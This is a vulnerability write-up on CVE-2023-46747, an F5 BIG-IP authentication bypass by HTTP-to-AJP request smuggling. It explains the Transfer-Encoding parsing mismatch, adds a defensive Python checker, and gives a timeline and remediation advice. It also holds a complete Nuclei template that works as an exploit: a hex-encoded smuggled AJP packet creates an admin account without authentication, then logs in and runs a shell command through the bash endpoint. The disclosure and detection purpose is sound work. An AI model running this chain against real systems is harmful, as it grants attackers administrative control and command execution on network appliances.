F5 BIG-IP Unauth RCE via AJP Smuggling (CVE-2023-46747) - Technical Analysis

Description:

CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility, identified as a request smuggling bug involving the Apache JServ Protocol (AJP). The flaw could allow unauthenticated attackers with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands. This vulnerability was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security. It has a CVSS score of 9.8 (critical severity).

Technical Details:


The attack primarily exploits HTTP-to-AJP request smuggling, which arises from inconsistent handling of the Content-Length and Transfer-Encoding headers between Apache HTTPd and the AJP processing in Tomcat. Here's a breakdown:

1. Origin of the Discrepancy: Apache HTTPd receives an HTTP request whose Transfer-Encoding header has the value "chunked, chunked", which it then sends to Tomcat via AJP. Tomcat, expecting Transfer-Encoding to be just "chunked", doesn't find a match. It then looks for a Content-Length header, which isn't there, so it defaults to assuming a Content-Length of 0.

2. Resulting Desynchronization: This misunderstanding means the AJP Data packet (essentially the POST Body of the HTTP request) is misinterpreted as a separate AJP Forward Request packet.

3. Exploiting the Gap: Attackers, by crafting the POST body to precisely 516 bytes (0x204 bytes), can evade the initial authentication checks and access specific /tmui/ endpoints directed to the AJP port.

4. Bypassing Further Checks: There are additional authentication steps on many /tmui/* pages. Overcoming these requires:
- Setting the REMOTE_USER attribute which can be done at the AJP level.
- Providing a REMOTEROLE request header with any valid integer role id, ensuring successful authentication bypass.

5. Gaining Full Access: The goal is to find requests under 516 bytes that grant admin user access or allow remote code execution. One such request was discovered that creates an admin user through the BIG-IP UI, specifically targeting the /tmui/Control/form endpoint. Though initially oversized, the request was slimmed down by removing redundant parameters to fit within the 516-byte limit.

6. Overcoming Final Hurdles: A CSRF check exists in the user creation action. It verifies that the _bufvalue parameter matches the base64-encoded SHA1 digest of the Tmui-Dubbuf header and the _timenow parameter concatenated together. Given full control of the request, we could calculate these values ahead of time. Also, to meet the requirement of a packet size of exactly 0x204 bytes, the Tmui-Dubbuf header was padded with extra "B"s.

7. Endgame: TL;DR: attackers can establish an admin user without prior authentication. Once this is done, they can use built-in F5 functionalities to run Bash commands, allowing them to execute code.
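
The framing mismatch described in steps 1 and 2, modelled for defenders as an added example (not code from the original post, Praetorian, F5, Apache or Tomcat). The two parser models are simplifications of the behaviour described above, and the function names, the `bigip.example` host and the sample request heads are constructed for illustration. It also covers the same value arriving as two separate Transfer-Encoding header lines.

```python
# Added example: models the header-parsing mismatch from step 1 and flags it.
# Sample request heads are constructed for illustration, not captured traffic.
SAMPLES = {
    "content_length": "POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example\r\n"
                      "Content-Length: 27\r\n\r\n",
    "plain_chunked": "POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example\r\n"
                     "Transfer-Encoding: chunked\r\n\r\n",
    "doubled_token": "POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example\r\n"
                     "Transfer-Encoding: chunked, chunked\r\n\r\n",
    "doubled_header": "POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example\r\n"
                      "Transfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n",
}

def parse_head(raw):
    """Split a request head into (method, path, [(lowercase name, value)])."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, path, headers

def front_end_is_chunked(headers):
    """Front-end model: Transfer-Encoding is a token list ending in chunked."""
    tokens = [t.strip().lower() for n, v in headers
              if n == "transfer-encoding" for t in v.split(",")]
    return bool(tokens) and tokens[-1] == "chunked"

def back_end_body_length(headers):
    """Back-end model from step 1: exact 'chunked', else Content-Length, else 0.
    Returns None when the body is treated as chunk-framed."""
    te = ", ".join(v for n, v in headers if n == "transfer-encoding")
    if te.lower() == "chunked":
        return None
    lengths = [v for n, v in headers if n == "content-length"]
    return int(lengths[0]) if lengths else 0

def check(raw):
    """Return a finding string when the two models disagree on body framing."""
    _method, path, headers = parse_head(raw)
    if front_end_is_chunked(headers):
        length = back_end_body_length(headers)
        if length is not None:
            scope = "tmui" if path.startswith("/tmui/") else "other"
            return f"framing-mismatch:{scope}:backend-length={length}"
    return None

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:15} {check(raw)}")
```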

Nuclei Template

The ProjectDiscovery research team compiled a template so that all nuclei users can detect systems in their attack surface that are exploitable via CVE-2023-46747. This was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the details of the vulnerability.

id: CVE-2023-46747

info:
  name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
  reference:
    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
    - https://my.f5.com/manage/s/article/K000137353
  tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive

variables:
  username: "{{hex_encode(rand_base(5))}}"
  password: "{{hex_encode(rand_base(12))}}"
  password2: "{{rand_base(14)}}"

http:
  - raw:
      - |+
        POST /tmui/login.jsp HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chunked, chunked
        Content-Type: application/x-www-form-urlencoded

        204
        {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
        0

    unsafe: true

  - raw:
      - |+
        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
        Content-Type: application/json

        {"password": "{{password2}}"}

      - |+
        POST /mgmt/shared/authn/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{hex_decode(username)}}", "password":"{{pass}}"}

      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{token}}
        Content-Type: application/json

        {"command":"run","utilCmdArgs":"-c id"}

    payloads:
      pass:
        - '{{password2}}'
        - '{{hex_decode(password)}}'
    skip-variables-check: true
    stop-at-first-match: true

    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - "([A-Z0-9]{26})"
        internal: true

      - type: regex
        part: body_3
        group: 1
        regex:
          - "\"commandResult\":\"(.*)\""

      - type: dsl
        dsl:
          - '"Username:" + hex_decode(username)'
          - '"Password:" + pass'
          - '"Token:" + token'
    matchers:
      - type: word
        words:
          - "commandResult"
          - "uid="
        condition: and

Timeline:

  • October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
  • October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
  • October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian.

Remediation:

Patching is the strongly recommended course of action to remediate this vulnerability. F5 has provided mitigation guidance alongside patching, especially for cases where patching cannot be performed immediately. It is advisable to review the F5 article for recommended mitigation steps and warnings. Additionally, F5 has cautioned that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.
